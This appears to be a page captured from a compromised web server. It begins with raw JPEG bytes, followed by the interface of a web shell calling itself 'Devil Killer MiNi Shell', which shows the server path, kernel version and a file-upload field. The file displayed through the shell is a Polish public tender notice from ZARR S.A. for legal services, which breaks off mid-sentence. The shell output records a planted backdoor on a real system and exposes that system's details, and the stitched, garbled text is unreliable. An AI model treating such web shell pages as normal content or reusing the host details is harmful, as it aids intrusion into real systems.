JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20231207/0053906901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie obsługi prawnej na rzecz Zachodniopomorskiej Agencji Rozwoju Regionalnego w latach 2024-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZACHODNIOPOMORSKA AGENCJA ROZWOJU REGIONALNEGO SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810603415</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Świętego Ducha 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-205</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 48 82 488</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">91 48 82 626</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@zarr.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zarr.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> uslugi finansowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie obsługi prawnej na rzecz Zachodniopomorskiej Agencji Rozwoju Regionalnego w latach 2024-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d52e027a-942f-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00539069</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zarr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się wyłącznie elektronicznie za pośrednictwem platformy przetargowej: https://portal.smartpzp.pl/zarr.<br/>Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z Platformy,<br/>dostępny na Platformie w zakładce „e-learning”, znajdującej się na pionowym pasku Menu po lewej stronie ekranu. Osobą<br/>uprawnioną do kontaktu z Wykonawcami jest Justyna Kotowicz – tel. 506 938 838.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozporządzeniem w sprawie<br/>środków komunikacji elektronicznej, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512kb/s;<br/>2) zaktualizowana przeglądarka internetowa (zalecane przeglądarki: Google Chrome, Mozilla Firefox, Opera);<br/>3) oprogramowanie Java ver. 1.8 (w przypadku systemu operacyjnego MacOs, także oprogramowanie Java JDK Oracle);<br/>4) aplikacja Szafir;<br/>5) rozszerzenie Szafir WebModule dla danej przeglądarki internetowej;<br/>6) kwalifikowany podpis elektroniczny lub podpis (profil) zaufany lub podpis osobisty (e-dowód) (dopuszczalne formaty podpisów:<br/>PAdES lub XAdES);<br/>7) dopuszczalne formaty danych: .pdf, .doc, .docx, .rtf, .xps, .odt, .xls, .xlsx, .zip, .zipx, .rar, 7z (zalecany .pdf);8) maksymalna<br/>wielkość pojedynczego pliku: 100MB;<br/>9) w zakresie dotyczącym szyfrowania oraz czasu przekazania i odbioru danych Zamawiający informuje, że złożona przez<br/>Wykonawcę za pomocą Platformy oferta jest widoczna w systemie jako zaszyfrowana, a możliwość jej odszyfrowania i otworzenia<br/>przez Zamawiającego możliwa jest po upływie terminu składania ofert; oznaczenie czasu odbioru danych przez Platformę stanowi<br/>przypięta do dokumentu elektronicznego data oraz dokładny czas.<br/>Szczegółowe informacje oraz instrukcja pokazująca niezbędne czynności konfiguracyjne do poprawnego działania Platformy, w<br/>szczególności w odniesieniu do pkt 3-5, zostały zamieszczone w instrukcji obsługi Platformy, o której mowa w ust. 2.<br/>Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. Za datę wpływu wszelkiej korespondencji do<br/>Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania<br/>korespondencji na Platformie. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz<br/>informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.Wszelka korespondencja<br/>kierowana do Zamawiającego powinna być opatrzona numerem postępowania i nazwą nadaną zamówieniu. Ofertę należy pod<br/>rygorem nieważności złożyć w języku polskim, z zachowaniem postaci<br/>elektronicznej i podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. Sposób złożenia oferty, opisany został w Instrukcji dostępnej na Platformie. Dokumenty lub oświadczenia, o<br/>których mowa w SWZ, są to oryginalne dokumenty lub oświadczenia<br/>w postaci elektronicznej, tj. w postaci dokumentu elektronicznego. Opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym.<br/>9. Cyfrowe odwzorowania dokumentu lub oświadczenia, o których mowa w SWZ, są to cyfrowe odwzorowania dokumentów lub<br/>oświadczeń sporządzonych w postaci papierowej poświadczone za zgodność z oryginałem.<br/>10. Poświadczenia za zgodność z oryginałem cyfrowego odwzorowania dokumentu lub oświadczenia dokonuje się w postaci<br/>elektronicznej, tj. kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) dalej<br/>„RODO”, informuję, że:Administratorem Pani/Pana danych osobowych jest Zachodniopomorska Agencja Rozwoju Regionalnego S.A., ul. św. Ducha 2, 70-<br/>540 Szczecin (dalej: ZARR S.A.),<br/>Administrator przetwarza Państwa dane osobowe w ściśle określonym, minimalnym zakresie niezbędnym do zawarcia, należytego<br/>wykonania, rozwiązania lub podjęcia innych czynności niezbędnych do realizacji zawartych umów, bądź wypełnienia obowiązków<br/>wynikających z przepisów prawa,<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b-c RODO w celu związanym niniejszym postępowaniem<br/>prowadzonym na podstawie przepisów ustawy Pzp,<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 ust. 1 i ust. 6 oraz art. 74 PZP,<br/>Dane osobowe przetwarzane przez ZARR S.A. przechowywane będą przez okres niezbędny do realizacji celu dla jakiego zostały<br/>zebrane oraz zgodnie z terminami archiwizacji określonymi przez przepisy aktualnie obowiązującego prawa, tj. przez czas trwania<br/>postępowania o udzielenie zamówieni oraz na podstawie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W<br/>szczególności dane osobowe:a)pozyskane w związku z zawartą umową będą̨ przetwarzane przez ZARR przez okres przedawnienia roszczeń podatkowych lub<br/>roszczeń cywilnoprawnych ZARR lub osoby, której dane są przetwarzane, w zależności które z tych zdarzeń nastąpi później,<br/>b)pozyskane w związku z realizacją prawnie uzasadnionego interesu przez ZARR - są przetwarzane przez okres wymagany<br/>przepisami prawa,c)pozyskane w związku z realizacją innych celów - są przetwarzane w czasie niezbędnym do zrealizowania celu.<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP,<br/>Każda osoba, której dane są przetwarzane przez ZARR S.A. - z wyjątkami zastrzeżonymi przepisami prawa - ma możliwość dostępu<br/>do swoich danych osobowych w bazie ZARR i ich sprostowania, usunięcia, ograniczenia ich przetwarzania, a także prawo do<br/>zgłoszenia sprzeciwu co do ich przetwarzania. Dostęp do danych możliwy jest w siedzibie ZARR. ZARR udostępnia adres e-mail<br/>iodo@zarr.com.pl, za pomocą którego można kontaktować się̨ w sprawie danych osobowych,<br/>Nie przysługuje Pani/Panu: prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO oraz prawo sprzeciwu wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Każda osoba, której dane są przetwarzane przez ZARR S.A. ma prawo wniesienia skargi do organu nadzorczego, którym jest<br/>Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>Podanie przez Państwa danych osobowych jest dobrowolne, aczkolwiek odmowa ich podania jest równoznaczna z brakiem<br/>możliwości wzięcia udziału w postępowaniu o udzielenie zamówienia.<br/>ZARR nie podejmuje zautomatyzowanych decyzji na podstawie danych osobowych, w tym nie dokonuje profilowania.<br/>Dane osobowe nie będą przekazywane do państwa trzeciego i organizacji międzynarodowych w rozumieniu ogólnego<br/>rozporządzenia o ochronie danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">14/WZM/272/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie obsługi prawnej na rzecz Zachodniopomorskiej Agencji Rozwoju Regionalnego S.A. (dalej ZARR S.A) w szczególności: 1)<br/>świadczenie usług kompleksowej i bieżącej obsługi prawnej oraz doradztwa prawnego w pełnym zakresie na rzecz ZARR S.A. przez minimum dwóch adwokatów / radców prawnych;<br/>2)<br/>osobiste uczestnictwo w spotkaniach, a także posiedzeniach organów spółek;<br/>3)<br/>zapewnienie osobistego dyżuru przez trzy dni robocze w tygodniu w siedzibie Zamawiającego w łącznym wymiarze 10 godzin tygodniowo; 4)<br/>udzielanie na bieżąco (w drodze kontaktów osobistych, telefonicznych, za pośrednictwem poczty elektronicznej lub komunikatorów internetowych, np. Microsoft Teams) porad prawnych, wyjaśnień i konsultacji w zakresie stosowania prawa;<br/>5)<br/>uczestniczenie lub reprezentowanie Zamawiającego w spotkaniach i negocjacjach prowadzonych z podmiotami i osobami trzecimi;<br/>6)<br/>sporządzanie pisemnych opinii prawnych, w terminie 3 dni roboczych od daty ich zlecenia i przekazanie w tym celu niezbędnej dokumentacji - termin ten, za zgodą Zamawiającego, może ulec wydłużeniu;<br/>7)<br/>sporządzanie lub opiniowanie umów, aneksów do umów, aktów prawnych, uchwał, rozwiązań systemowych ZARR S.A. w świetle obowiązujących przepisów;<br/>8)<br/>sporządzanie lub opiniowanie obowiązujących u Zamawiającego regulaminów i ich aktualizacja;<br/>9)<br/>występowanie w charakterze pełnomocnika przed wszelkimi urzędami i organami władzy publicznej, a także sądami powszechnymi, Sądem Najwyższym, sądami administracyjnymi oraz organami egzekucyjnymi, w zakresie związanym z bieżącą działalnością spółki;<br/>10)<br/>zastępstwo w postępowaniu rejestracyjnym (aktualizacja wpisów do KRS); 11)<br/>opiniowanie i doradztwo w zakresie przygotowywania i prowadzenia postępowań o udzielenie zamówień publicznych, w tym również współpraca z Urzędem Zamówień Publicznych oraz zastępstwo w postępowaniach przed Krajową Izbą Odwoławczą oraz w postępowaniach skargowych;<br/>12)<br/>doradztwo i opiniowanie kwestii związanych z przetwarzaniem danych osobowych, a także dostosowanie procedur i sposobu przetwarzania danych osobowych do wymogów powszechnie obowiązujących przepisów w tym zakresie, opracowywanie/sprawdzanie umów powierzenia przetwarzania danych osobowych, opracowanie wzorów dokumentów wymaganych przez RODO i inne przepisy prawa, które związane są z ochroną danych osobowych;<br/>13)<br/>monitorowanie zmian aktów prawnych o charakterze powszechnym, mających wpływ na działalność spółki oraz niezwłoczne informowanie Zamawiającego o przedmiotowych zmianach;<br/>14)<br/>świadczenie obsługi prawnej związanej z realizowanymi przez Zamawiającego projektami unijnymi, z tym zastrzeżeniem, że w przypadku, gdy Zamawiający w trakcie trwania umowy rozpocznie realizację innego projektu, Wykonawca zobowiązany będzie w ramach realizacji przedmiotu zamówienia świadczyć obsługę prawną również w zakresie tego projektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem XVI Specyfikacji warunków zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej jeżeli: <br/>a)w okresie ostatnich trzech (3) lat przed upływem terminu składania a jeżeli okres prowadzenia działalności gospodarczej jest krótszy – w tym okresie wykonał lub wykonuje należycie usługę bieżącej obsługi prawnej, co najmniej dwóch spółek kapitałowych z większościowym udziałem samorządu terytorialnego, w tym co najmniej 1 spółki akcyjnej z udziałem jednostki samorządu terytorialnego przez okres nie krótszy niż 24 miesiące oraz świadczył usługę doradztwa prawnego przy dokonaniu podziałów, przekształceń lub połączeń spółek w rozumieniu KSH.<br/>Uwaga:<br/>1) Zamawiający poprzez jedną usługę rozumie wykonanie/wykonywanie obsługi prawnej w ramach jednej umowy.<br/>2) Jeżeli usługa przedstawiana na potwierdzenie spełniania warunku jest w trakcie realizacji (usługa wykonywana), to okres jej wykonywania do dnia składania ofert nie może być krótszy niż 24 miesiące.<br/>b) dysponuje bądź będzie dysponował co najmniej 2 osobami, z których każda posiada uprawnienia do wykonywania zawodu adwokata lub radcy prawnego, zgodnie z ustawą z d nia 26 maja 1982 r Prawo o adwokaturze (t. jedn. Dz. U. z 2020 r., poz. 1651 z późn. zm.) lub ustawą z dnia 6 lipca 1982 o radcach prawnych (t. jedn. Dz. U. z 2020 r., poz. 75 z późn. zm), lub prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (t. jedn. Dz. U. z 2020 r., poz. 823) oraz każda posiada co najmniej 5 letnie doświadczenie zawodowe jako radca prawny lub adwokat, w tym:<br/>•wykonała lub wykonuje należycie bieżącą obsługę prawną co najmniej 1 spółki kapitałowej z udziałem jednostki samorządu terytorialnego przez okres nie krótszy niż 24 miesiące, oraz<br/>•występowała w postępowaniach przed sądami powszechnymi, sądami administracyjnymi i prokuraturą oraz innymi organami administracji publicznej, w tym przed Krajową Izba Odwoławczą, oraz<br/>•jako radca prawny lub adwokat brała udział w obsłudze prawnej projektów współfinansowanych ze środków UE co najmniej przez okres 24 miesięcy, oraz<br/>•jako radca prawny lub adwokat, posługuje się biegle językiem angielskim co najmniej na poziomie C1 lub równoważnym,<br/>przy czym przynajmniej jedna osoba ma to potwierdzone certyfikatem językowym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 1 Rozdziału VIII SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym Załącznik nr 3 do SWZ.<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami 